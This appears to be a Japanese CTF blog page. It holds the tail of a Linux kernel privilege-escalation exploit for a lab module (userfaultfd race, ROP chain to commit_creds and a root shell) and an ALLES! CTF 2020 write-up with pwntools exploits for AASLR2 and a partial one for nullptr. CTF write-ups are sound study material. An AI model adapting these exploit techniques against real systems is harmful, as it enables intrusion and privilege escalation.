  long uffd = (long)arg;        // userfaultfd file descriptor
  struct pollfd pollfd;         //
  int nready;                   // number of polled events
  ulong hogebuf;

  // set poll information
  pollfd.fd = uffd;
  pollfd.events = POLLIN;

  // wait for poll
  puts("[+] polling...");
  while(poll(&pollfd, 1, -1) > 0){
    if(pollfd.revents & POLLERR || pollfd.revents & POLLHUP)
      errExit("poll");

    // read an event
    if(read(uffd, &msg, sizeof(msg)) == 0)
      errExit("read");

    if(msg.event != UFFD_EVENT_PAGEFAULT)
      errExit("unexpected pagefault");

    printf("[!] page fault: %p\n",msg.arg.pagefault.address);

    //********* Now, another thread is halting. Do my business. **//
    // leak kernbase
    puts("[+] pop before push!");
    _pop(&hogebuf); // leak shm_file_data->ipc_namespace
    leak = hogebuf;
    kernbase = leak-0xc38600;
    printf("[!] leaked: %llx\n", leak);
    printf("[!] kernbase(text): %llx\n", kernbase);

    // change page permission and make fail copy_from_user
    mprotect(msg.arg.pagefault.address & ~(PAGE-1), PAGE, PROT_NONE);
    printf("[+] mprotected as PROT_NONE: %p\n", msg.arg.pagefault.address & ~(PAGE-1));
    uffdio_range.start = msg.arg.pagefault.address & ~(PAGE-1);
    uffdio_range.len = PAGE;
    if(ioctl(uffd, UFFDIO_UNREGISTER, &uffdio_range) == -1)
      errExit("ioctl-UFFDIO_UNREGISTER");
    printf("[+] unregistered supervisored region.\n");

    break;
  }

  puts("[+] exiting fault_handler_thrd");
}

// cf. man page of userfaultfd
void register_userfaultfd_and_halt(void)
{
  puts("[+] registering userfaultfd...");

  long uffd;      // userfaultfd file descriptor
  pthread_t thr;  // ID of thread that handles page fault and continue exploit in another kernel thread
  struct uffdio_api uffdio_api;
  struct uffdio_register uffdio_register;
  int s;

  // create userfaultfd file descriptor
  uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK); // there is no wrapper in libc
  if(uffd == -1)
    errExit("userfaultfd");

  // enable uffd object via ioctl(UFFDIO_API)
  uffdio_api.api = UFFD_API;
  uffdio_api.features = 0;
  if(ioctl(uffd, UFFDIO_API, &uffdio_api) == -1)
    errExit("ioctl-UFFDIO_API");

  // mmap
  puts("[+] mmapping...");
  addr = mmap(addr, len, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0); // set MAP_FIXED for memory to be mmaped on exactly specified addr.
  puts("[+] mmapped...");
  if(addr == MAP_FAILED)
    errExit("mmap");

  // specify memory region handled by userfaultfd via ioctl(UFFDIO_REGISTER)
  uffdio_register.range.start = addr;
  uffdio_register.range.len = PAGE*0x10;
  uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
  if(ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1)
    errExit("ioctl-UFFDIO_REGISTER");

  s = pthread_create(&thr, NULL, fault_handler_thread, (void*)uffd);
  if(s!=0){
    errno = s;
    errExit("pthread_create");
  }

  puts("[+] registered userfaultfd");
}


int main(void)
{
  /** gadgets **/
  ulong pop_rdi = 0x194964;
  // 0xffffffff81194964: pop rdi ; ret  ;  (19 found)
  ulong pop_rcx = 0x0dee43;
  // 0xffffffff810dee43: pop rcx ; ret  ;  (49 found)
  ulong stack_pivot = 0x059d8b;
  // 0xffffffff81059d8b: mov esp, 0x83C389C0 ; ret  ;  (1 found)
  ulong prepare_kernel_cred = 0x06b960;
  // ffffffff8106b960 T prepare_kernel_cred
  ulong mov_rdi_rax = 0x0187bf;
  // 0xffffffff810187bf: mov rdi, rax ; rep movsq  ; pop rbp ; ret  ;  (1 found)
  ulong commit_creds = 0x06b770;
  // ffffffff8106b770 T commit_creds
  ulong swapgs_restore_regs_and_return_to_usermode = 0x600a4a;
  // ffffffff81600a34 T swapgs_restore_regs_and_return_to_usermode
  /*
   0xffffffff81600a4a <common_interrupt+74>:    mov    rdi,rsp
   0xffffffff81600a4d <common_interrupt+77>:    mov    rsp,QWORD PTR gs:0x5004
   0xffffffff81600a56 <common_interrupt+86>:    push   QWORD PTR [rdi+0x30]
   0xffffffff81600a59 <common_interrupt+89>:    push   QWORD PTR [rdi+0x28]
   0xffffffff81600a5c <common_interrupt+92>:    push   QWORD PTR [rdi+0x20]
   0xffffffff81600a5f <common_interrupt+95>:    push   QWORD PTR [rdi+0x18]
   0xffffffff81600a62 <common_interrupt+98>:    push   QWORD PTR [rdi+0x10]
   0xffffffff81600a65 <common_interrupt+101>:   push   QWORD PTR [rdi]
   0xffffffff81600a67 <common_interrupt+103>:   push   rax
   0xffffffff81600a68 <common_interrupt+104>:   xchg   ax,ax
   0xffffffff81600a6a <common_interrupt+106>:   mov    rdi,cr3
   0xffffffff81600a6d <common_interrupt+109>:   jmp    0xffffffff81600aa3 <common_interrupt+163>
   0xffffffff81600a6f <common_interrupt+111>:   mov    rax,rdi
   0xffffffff81600a72 <common_interrupt+114>:   and    rdi,0x7ff

  */


  void *tmp_addr;
  ulong tmp_buf = 0xdeadbeef;
  int sfd;
  unsigned long* fstack;
  ulong *rop;

  // save state
  save_state();

  //  open target proc file
  if((fd=open("/proc/stack",O_RDONLY))<0)
    errExit("open-/proc/stack");

  // set userfaultfd
  register_userfaultfd_and_halt();
  sleep(1);

  //
  call_shmat(); // kalloc and kfree shm_file_data structure at kmalloc-32
  _push(addr); // invoke fault

  // alloc seq_operations;
  if((sfd = open("proc/self/stat", O_RDONLY)) == -1)
    errExit("single_open");

  // overwrite seq_operations;
  char buf[0x20];
  printf("[+] stack pivot gadget: %p\n", kernbase + stack_pivot);
  for(int ix=0; ix!=4; ++ix) // first 8byte is useless.
    *(ulong*)(buf+ix*8) = (kernbase + stack_pivot);
  setxattr("/tmp", "SHE_IS_SUMMER", buf, 0x20, XATTR_CREATE);

  // alloc fake stack for 0x83C389C0
  fstack = mmap(0x83C38000, 0x2000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
  if(fstack != 0x83C38000)
    errExit("fstack");

  /********** construct kROP ***************/
  rop = (ulong*)0x83C389c0;
  // Get cred of init task.
  *rop++ = kernbase + pop_rdi;
  *rop++ = 0;
  *rop++ = kernbase + prepare_kernel_cred;
  // Commit that cred.
  *rop++ = kernbase + pop_rcx;      // Cuz mov_rdi_rax gadget contains rep inst, set counter to 0.
  *rop++ = 0;
  *rop++ = kernbase + mov_rdi_rax;
  *rop++ = 0; // fake rbp
  *rop++ = kernbase + commit_creds;
  // Return to usermode by swapgs_restore_regs_and_return_to_usermode
  *rop++ = kernbase + swapgs_restore_regs_and_return_to_usermode;
  *rop++ = 0;
  *rop++ = 0;
  *rop++ = (ulong)&pop_shell;
  *rop++ = user_cs;
  *rop++ = user_rflags;
  *rop++ = user_sp;
  *rop++ = user_ss;

  // pop shell
  read(sfd, buf, 0x10);

  return 0;
}


/****

#!/bin/sh
sudo rm -r ./extracted
mkdir extracted
cp ./rootfs.cpio ./rootfs_temp.cpio
cd ./extracted
cpio -idv < ../rootfs_temp.cpio
cd ../
rm ./rootfs_temp.cpio

gcc ./exploit.c -o exploit --static -pthread
cp ./exploit ./extracted/
cp ./build/kstack.ko ./extracted/root/kstack.ko

rm ./myrootfs.cpio
chmod 777 -R ./extracted
cd ./extracted
find ./ -print0 | cpio --owner root --null -o --format=newc > ../myrootfs.cpio
cd ../

qemu-system-x86_64 \
    -m 512M \
    -kernel ~/buildroot-2020.02.5/output/images/bzImage \
    -initrd ./myrootfs.cpio \
    -append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet" \
    -cpu kvm64,+smep \
    -net user -net nic -device e1000 \
    -monitor /dev/null \
    -nographic

# Makefile
obj-m += kstack.o
all:
                make -C /home/wataru/buildroot-2020.02.5/output/build/linux-4.19.91/ M=$(PWD)  modules
                EXTRA_CFLAGS="-g DDEBUG"
clean:
                make -C /home/wataru/buildroot-2020.02.5/output/build/linux-4.19.91/ M=$(PWD)  clean


****/

7: アウトロ

次はkvdbでもやろうかな

あとほんの少しだけ続く...

• 1: イントロ
• 2: SpecialThanks
• 0: 参考

1: イントロ

2: SpecialThanks

本記事は、分科会 #sig-pwn-beginnerの一環として書かれたものではありません

0: 参考

www.youtube.com

続くわけがねぇ・・・

• 1: イントロ
• 2: まず全体の感想
• 3: AASLR1/ AASLR2
  • 問題概要
  • 乱数生成器の掌握 
  • pwn
  • exploit
  • 結果
• 4. nullptr
  • 問題概要
  • 思考の道筋
  • どうやら想定解っぽいもの
  • exploit: 途中まで
• 5: アウトロ

1: イントロ

いつぞや行われた ALLES! CTF 2020

最近CTFをしていなかったのですが、チームTSGとして参加して、結果は振るわず22位でした

pwn問をもう1個解き切っていれば5~7位分くらい上昇したので、実力不足です

本エントリではpwn問の AASLR1 / AASLR2 / nullptr の復習(writeupでは若干無いです、完全に解ききっていないやつが有るので)をしたいと思います

2: まず全体の感想

InterKosen CTFとの並行開催ということもあり、最初はALLES!の方とInterKosenの方をウロウロ行ったり来たりしていました。夜になるとチームの人たちがmeetに集まってきたので、本腰を入れてALLESのpwn問を解くことにしました。Cryptoとの合同問題があり、Cryptoパートを解いてもらっている間に長いお散歩をしました。Pwn問題にまで落とし込んでもらった後、その日は AASLR2 を解きました。解き終わるとmeetを抜けて寝ました。起きると、全くやる気がなくなっていたので、最近買ったギドラ本を読んでいました。最終日の深夜になると、チームの人から nullptr を解きませんかと誘っていただいたので、meetに集まって終了時間(AM4:00)まで問題を解いていました。結構いい線まで言っていたので、解ききることができずに悔しかったです。

CTFは問題面もその他の面もかなり良かったと思います。

3: AASLR1/ AASLR2

問題概要

Author: liveoverflowの文字を見て、何故か笑顔になってしまいました

liveoverflowさんのYoutube動画は偶に見るので、芸能人に会った気分になりました

AASLR1はRev/Crypto問題、AASLR2はPwn問題でした

問題セットは両者ともに同じであり、前者は特定の条件を満たすとプログラム中の正規のロジックとして1つ目のFlagが得られ、後者は正規のロジックから外れてFlagを奪取します

ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=1caebb4c4c5b9bb141671f3721daaabd26f49312, for GNU/Linux 3.2.0, not stripped
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

オレオレmalloc問題です

最初に mmap() で取得した領域から aslr_malloc() でユーザ用に領域を確保してくるのですが、この際に乱数生成器から得た乱数をもとにして確保するアドレスを決定します

この乱数生成器のシードはプログラムの最初に呼んだ time() の値だけです

また、確保した領域を管理する機構がないため、生成された乱数の値によっては overlapped chunk が作られることになります

乱数生成器の掌握 

さて、まずはこの乱数生成器が次に吐く乱数を予測できないことには始まりません

プログラム中には、dice() という関数によって生成される乱数のmod6 の値のみを任意に取得することができます

僕は数学が小学2年生の計算くらいしかできないので、他の人に任せていました。mod6のみで乱数生成器を掌握するのは難しいようで一旦詰まりましたが、time()を使っているのだから接続した時間の前後数秒をそれぞれシードにした乱数生成器をこちら側で用意し、dice() を振ってどの生成器の出力と一致するかを調べることで乱数生成器の状態を掌握することができました

pwn

乱数生成器の状態を掌握することで、aslr_malloc() によって確保されるchunkのアドレスが予測できるようになりました。このアドレスは前述したように数百回のmallocによって重複する可能性があります。そのため、手持ちの乱数生成器で何回目のaslr_malloc() によって衝突が起こるかを計算し、その分だけdice() を振ってやることで乱数調整をします

overlapped chunkを作ったら、ユーザデータのポインタを確保する配列が有るのでそれを良しなにいじりながら、ヒープ中に有るvtableをよしなにいじると、よしなになります

exploit

本exploitは @JP3BGY と作りました

#!/usr/bin/env python
#encoding: utf-8;

from pwn import *
from time import time
import sys
import socket,ssl

FILENAME = "./aaslr"
LIBCNAME = ""

hosts = ("7b00000009836e5ea6bc9e72.challenges.broker4.allesctf.net","localhost","localhost")
ports = (1337,12300,23947)
rhp1 = {'host':hosts[0],'port':ports[0]}    #for actual server
rhp2 = {'host':hosts[1],'port':ports[1]}    #for localhost 
rhp3 = {'host':hosts[2],'port':ports[2]}    #for localhost running on docker
context(os='linux',arch='amd64')
binf = ELF(FILENAME)
libc = ELF(LIBCNAME) if LIBCNAME!="" else None


## utilities #########################################

realstate = None
ftable_off = None
entry_off = None

def hoge(ix):
  global c
  c.recvuntil("Item:\n")
  c.sendline(str(ix))

def td():
  global c
  hoge(1)
  c.recvuntil("Threw dice: ")
  return int(c.recvline().rstrip())

def _create(data):
  global c
  hoge(2)
  c.recvuntil("100):\n")
  c.send(data)

def _create_state_change(data):
  global realstate
  _create(data)
  realstate = prng(realstate)[1]

def _create_state_change_get_rand(data):
  global realstate
  _create(data)
  val, realstate = prng(realstate)
  return val


def _view(ix):
  global c
  hoge(3)
  c.recvuntil("):\n")
  c.sendline(str(ix))
  c.recvuntil(". ")
  return c.recvline().rstrip()

def _guess():
  global c
  raw_input("NOT IMPLEMENTED")

def prng(state):
    mask=(1<<64)-1
    a,b,c,d=state
    tmp1=a-((b>>5)|((b<<0x1b)&mask))
    tmp1&=mask
    a=b^((c>>0xf)|((c<<0x11)&mask))
    a&=mask
    tmp2=a+tmp1
    tmp2&=mask
    b=c+d
    b&=mask
    c=d+tmp1
    c&=mask
    d=tmp2
    return (tmp2,(a,b,c,d))

def get_malloc_offset(size):
    global realstate
    val, realstate = prng(realstate)
    return val % (0x10000 - size)

def dice(state):
    x,y=prng(state)
    return (x%6+1,y)

def guess_dice(nums):
  hoge(4)
  for i in range(0xf):
    c.recvline()
    c.sendline(str(nums[i]))

def send_many_dices(num):
  if num==0:
    return
  c.recvuntil("Item:\n")
  c.send("1\n"*num)

# 次にお望みのaddr-size~addrを吐くようになるまでdiceを振る
def set_recquestedd_state(req, size, aligend=None):
  global realstate
  global c
  counter = 0
  while True:
    val, realstate = prng(realstate)
    val = val%(0x10000-100)
    if aligend==None or (aligend!=None and val%8==aligend):
        if req-size<= val <=req:
          print("[+] FOUND({}): {}".format(hex(counter), hex(val)))
          print("[+] updating state...")
          '''
          for i in range(counter):
            if i%0x30==0:
                print("   {}".format(hex(i)))
            td()
          '''
          for i in range(counter//0x100):
            print("  sending... : {}".format(hex((i+1)*0x100)))
            send_many_dices(0x100)
          send_many_dices(counter%0x100)
          return val
    counter += 1


## exploit ###########################################

def exploit():
  global c
  global realstate
  global ftable_off
  global entry_off
  cons = 0xf1ea5eed

  nowtime=int(time())
  states = [ (cons,nowtime+i,nowtime+i,nowtime+i)for i in range(-30,31)]
  vptrs = []
  entrys = []
  for i in range(0x16):
    newstates=[]
    for j in states:
        x,y= prng(j)
        newstates.append(y)
        if i==0x14:
          vptrs.append(x)
        elif i==0x15:
          entrys.append(x)
    states=newstates

  while len(states)>1:
    newstates=[]
    newrnds=[]
    newentrys=[]
    x = td()
    for j in range(len(states)):
      i = states[j]
      xx,y=dice(i)
      if xx==x:
        newstates.append(y)
        newrnds.append(vptrs[j])
        newentrys.append(entrys[j])

    states=newstates
    vptrs = newrnds
    entrys = newentrys

  assert(len(states)==1)
  assert(len(vptrs)==1)
  assert(len(entrys)==1)
  realstate = states[0]

  # AASLR1 ####
  guessed = []
  for i in range(0xf):
    x,realstate = prng(realstate)
    x = x%6+1
    guessed += [x]
  guess_dice(guessed)


  # AASLR2 ####
  ftable_off = vptrs[0] % (0x10000 - 0x8)
  entry_off = entrys[0] % (0x10000 - 0x7f8)
  print("[+] ftable_off: {}".format(hex(ftable_off)))
  print("[+] entry_off: {}".format(hex(entry_off)))

  # create dummys
  _create_state_change("A"*0x50+"\n")
  _create_state_change("B"*0x50+"\n")
  _create_state_change("C"*0x50+"\n")

  #
  target_off = entry_off+8*4
  hoge_off = target_off+0x40 - set_recquestedd_state(target_off+0x40, 0x40, aligend=entry_off%8)
  print("[+] target: {}".format(hex(target_off)))
  print("[+] hoge_off: {}".format(hex(hoge_off)))
  _create("X"*0x50 + "\n")
  c.recvuntil("at index ")
  tmpix = int(c.recvline().rstrip())

  fuck = []
  for i in range(0x20):
    fuck.append(_create_state_change_get_rand("Y"*8 + "\n") % (0x10000-100))
  vmaddr1 = unpack(_view(tmpix).ljust(8,b'\x00'))
  print("[+] get: {}".format(hex(vmaddr1)))
  print("[+] fuck: {}".format(hex(fuck[0])))

  # 諦め
  for i in range(len(fuck)):
    print("[+] fuck: {}".format(hex(fuck[i])))
    if (vmaddr1 - fuck[i])%0x100 == 0:
      mmbase = vmaddr1 - fuck[i]
      break
  print("[+] HEAP: {}".format(hex(mmbase)))
  print("[*] ftable: {}".format(hex(ftable_off + mmbase)))
  print("[*] ENTRY: {}".format(hex(entry_off + mmbase)))


  # ftableを読みに行く(textbase leak)
  target_off = entry_off
  hoge_off = target_off - set_recquestedd_state(target_off, 84)
  print("")
  print("[+] target: {}".format(hex(target_off)))
  print("[+] hoge_off: {}".format(hex(hoge_off)))
  _create(b"A"*hoge_off + p64(ftable_off + mmbase)*((100-hoge_off)//8-1) + b"\n")
  c.recvuntil("at index ")
  tmpix = int(c.recvline().rstrip())

  throw_dice_addr = unpack(_view(0).ljust(8,b'\x00'))
  print("[+] throw_dice(): {}".format(hex(throw_dice_addr)))
  textbase = throw_dice_addr - 0x1584
  print("[+] textbase: {}".format(hex(textbase)))

  # overwrite ftable into system
  target_off = ftable_off
  hoge_off = target_off - set_recquestedd_state(target_off, 84-0x10)
  print("")
  print("[+] target: {}".format(hex(target_off)))
  print("[+] hoge_off: {}".format(hex(hoge_off)))
  #_create(b"A"*hoge_off + p64(textbase + 0x1905)*((100-hoge_off)//8-1) + b"\n")
  _create(b"A"*hoge_off + p64(textbase+0x1905)*4 + p64(textbase+0x1afc) + b"\n")
  c.recvuntil("at index ")
  tmpix = int(c.recvline().rstrip())
  
  # jmp to system via error_case() function's entry
  c.recvuntil("Item:\n")
  print("[!] invoking shell...")
  c.sendline("/bin/sh")

  #c.sendline("cat ./flag1")


## main ##############################################

if __name__ == "__main__":
    global c
    
    if len(sys.argv)>1:
      if sys.argv[1][0]=="d":
        cmd = """
          set follow-fork-mode parent
        """
        c = gdb.debug(FILENAME,cmd)
      elif sys.argv[1][0]=="r":
        context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
        context.verify_mode = ssl.CERT_REQUIRED
        context.check_hostname = True
        context.load_default_certs()
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        ssl_sock = context.wrap_socket(s, server_hostname=rhp1["host"])
        ssl_sock.connect((rhp1["host"],rhp1["port"]))
        c = remote.fromsocket(ssl_sock)
      elif sys.argv[1][0]=="v":
        c = remote(rhp3["host"],rhp3["port"])
    else:
        c = remote(rhp2['host'],rhp2['port'])
    exploit()
    c.interactive()

結果

4. nullptr

問題概要

PartialRELROです 

ちょっと弄ってあげるだけ、AAR になります

ただし、その後できることは 「任意のアドレスの8byteをヌルクリアする」ことだけです

思考の道筋

本問題は @moratorium08 と一緒に解こうとしたため以下のアイディアやexploitにはモラさんのものが含まれてます

問題文にWelcome to the House Of I'm pretty sure this is not even a heap challenge(試訳: House of これはヒープ問ですら無いよ にようこそ) とあったので、heap問だと検討をつけて考えました

まず、mainループの間に実行されるのが scanf()/ printf()/ NULLクリア だけなので、ヌルクリアするべき対象は自然とstdin/stdout関係であると推察できます

scanf() はバッファリングのためにヒープ上のバッファを使います。このバッファのアドレスはstdin->__IO_buf_base に入っているのですが、この値がヌルクリアされた場合バッファが確保されていないと考えられて、malloc()を行います。よって、top のサイズを事前に小さくしてあげることで、次のscanf時にtop を拡張させることができます。更に、main_arena->top を部分的にNULLクリアしてあげることで 1/2048 の確率で次のtopがGOT領域と重なるところに確保されます。

scanf() の入力として任意の値を入力してやることで、勿論scanf自体はエラーを返しますが、バッファリングはちゃんとされるため、その領域に対して任意の入力をすることができるようになると考えました。尚、この手法はバッファリングに使うバッファのサイズ設定に環境依存し、0x1000未満だと成功します。

本番中はこの考えに懸けて、ローカルでシェルが取れましたが、リモートでとることは無理だろうということで、結局解ききることはできませんでした。 

【追記 20200908】

全く同じ方法でpwnできてる人がいたみたい

pwn-diaries.com

どうやら想定解っぽいもの

基本的には上に述べたことと同じアイディアですが、GOTではなく__malloc_hookを書き換えます。そのためには新しいstdinバッファがlibc symbolsよりも高位にきていなければならないため、mmap() でバッファを取得する必要があります。これは、mp_->mmap_threshold を予めヌルクリアしてから上述のようにmalloc()を呼ぶことで達成できます。あとは、確保した領域から__malloc_hookまでの間に有るデータの内破壊してはいけないものを正規の値で上書きしながら、__malloc_hookを書き換えるだけです。

但し、なんか環境依存っぽい要素が複数有るっぽぃ(自分の無知かもしれない)のと、昨日深夜4:00まで同じ問題を解いていたということの疲れもあり、まだPoCは完成していません。殆どやることはないですが、あとで完全なPoCを貼っておきます。

exploit: 途中まで

#!/usr/bin/env python
#encoding: utf-8;

from pwn import *
import sys
import socket,ssl
import time

FILENAME = "./nullptr"
LIBCNAME = ""

hosts = ("7b0000000158d462b15a9bee.challenges.broker3.allesctf.net","localhost","localhost")
ports = (1337,12300,23947)
rhp1 = {'host':hosts[0],'port':ports[0]}    #for actual server
rhp2 = {'host':hosts[1],'port':ports[1]}    #for localhost 
rhp3 = {'host':hosts[2],'port':ports[2]}    #for localhost running on docker
context(os='linux',arch='amd64')
binf = ELF(FILENAME)
libc = ELF(LIBCNAME) if LIBCNAME!="" else None


## utilities #########################################

def hoge(ix):
  global c
  c.recvuntil("> \n",timeout=1)
  c.sendline(str(ix))

'''
abc=0
def v(addr):
  global abc
  hoge(1)
  c.recvline()
  if addr==None:
    c.sendline("*")
  else:
    c.sendline(str(addr))
  if abc==3:
      c.interactive()
  _addr, val = c.recvline().rstrip().split(b": ")
  abc += 1
  return (int(_addr,16), int(val,16))
'''
def v(addr):
  hoge(1)
  c.recvuntil("\n",timeout=1)
  if addr==None:
    c.sendline("*")
  else:
    c.sendline(str(addr))
  tmp = c.recvline().rstrip().split(b": ") # なんで時々落ちるねん
  print(tmp)
  _addr, val = (tmp[0],tmp[1])
  return (int(_addr,16), int(val,16))

def n(addr):
  hoge(2)
  print("[+] NULLing OUT")
  c.recvline(timeout=0.1)
  c.sendline(str(addr))

def p(num):
  addr = num[0]
  val = num[1]
  print("[*] {}: {}".format(hex(addr), hex(val)))
  return addr, val


## exploit ###########################################

def _exploit():
  global c

  # leak each bases
  a1, v1 = p(v(None)) # first leaked stack addr
  a2, v2 = p(v(a1 - 0xd8)) # leak libc_start_main
  libcbase = v2 - 0x271e3
  mainstack_bottom = a1 - 0xe0 # main frame内の退避されたBPが置いてある場所
  a3, v3 = p(v(mainstack_bottom + 0x5*8)) # leak textbase
  main_addr = v3
  textbase = main_addr - 0x1bd
  print("[+] libcbase: {}".format(hex(libcbase)))
  print("[+] main stack bottom: {}".format(hex(mainstack_bottom)))
  print("[+] main: {}".format(hex(main_addr)))
  print("[+] textbase: {}".format(hex(textbase)))

  stdin_addr = libcbase + 0x1ea980
  stdout_addr = libcbase + 0x1eb6a0
  heap_base = p(v(stdin_addr + 8))[1] - 0x12a0 # ??? remoteでは違うかも(buf sizeが)
  print("[+] heap: {}".format(hex(heap_base)))
  raw_input("OK")

  # NULL clear mp_->mmap_threshold
  mp__addr = libcbase + 0x1ea280
  n(mp__addr + 0x10)

  # smallen old top's size
  oldtop = heap_base + 0x22b0
  n(oldtop + 9)

  raw_input("OK")

  # NULL clear stdin->__IO_buf_base and mmap
  n(stdin_addr + 7*8)
  c.interactive()
  leaked = p(v(stdin_addr + 8))[1]
  '''
  The bottom libc area is the target (in this case, fail)
    0x7fa216ac1000     0x7fa2168bd000 r-xp   1b1000 0      /glibc/2.30/64/lib/libc-2.30.so
    0x7fa2168bd000     0x7fa216abd000 ---p   200000 1b1000 /glibc/2.30/64/lib/libc-2.30.so
    0x7fa216abd000     0x7fa216ac1000 r--p     4000 1b1000 /glibc/2.30/64/lib/libc-2.30.so
    0x7fa216ac1000     0x7fa216ac3000 rw-p     2000 1b5000 /glibc/2.30/64/lib/libc-2.30.so
    0x7fa216ac3000     0x7fa216ac7000 rw-p     4000 0
  '''
  target = libcbase + 0x3b5000
  print("[+] target: {}".format(hex(target)))
  print("[+]       : {}".format(hex(leaked & 0xFFFFFFFF0000)))
  if leaked & 0xFFFFFFFF0000 != target:
    hoge(-1)
    print("[-] RETRY...\n")
    return False

  '''
  '''



def exploit():
  ret = False
  try:
    ret = _exploit()
  except ssl.SSLError:
    print("FUCK")
  return ret



## main ##############################################

if __name__ == "__main__":
    global c
    
    if len(sys.argv)>1:
      if sys.argv[1][0]=="d":
        cmd = """
          set follow-fork-mode parent
        """
        c = gdb.debug(FILENAME,cmd)
      elif sys.argv[1][0]=="r":
        context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
        context.verify_mode = ssl.CERT_REQUIRED
        context.check_hostname = True
        context.load_default_certs()
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        ssl_sock = context.wrap_socket(s, server_hostname=rhp1["host"])
        ssl_sock.connect((rhp1["host"],rhp1["port"]))
        c = remote.fromsocket(ssl_sock)
      elif sys.argv[1][0]=="v":
        c = remote(rhp3["host"],rhp3["port"])
    else:
        c = remote(rhp2['host'],rhp2['port'])

    fail = True
    while fail:
      if exploit() == False:
        c.close()
        sleep(0.5)
        if len(sys.argv)>1:
          if sys.argv[1][0]=="d":
            cmd = """
              set follow-fork-mode parent
            """
            c = gdb.debug(FILENAME,cmd)
          elif sys.argv[1][0]=="r":
            context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
            context.verify_mode = ssl.CERT_REQUIRED
            context.check_hostname = True
            context.load_default_certs()
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            ssl_sock = context.wrap_socket(s, server_hostname=rhp1["host"])
            ssl_sock.connect((rhp1["host"],rhp1["port"]))
            c = remote.fromsocket(ssl_sock)
          elif sys.argv[1][0]=="v":
            c = remote(rhp3["host"],rhp3["port"])
        else:
            c = remote(rhp2['host'],rhp2['port'])

    c.interactive()

5: アウトロ

 ねむい

続く...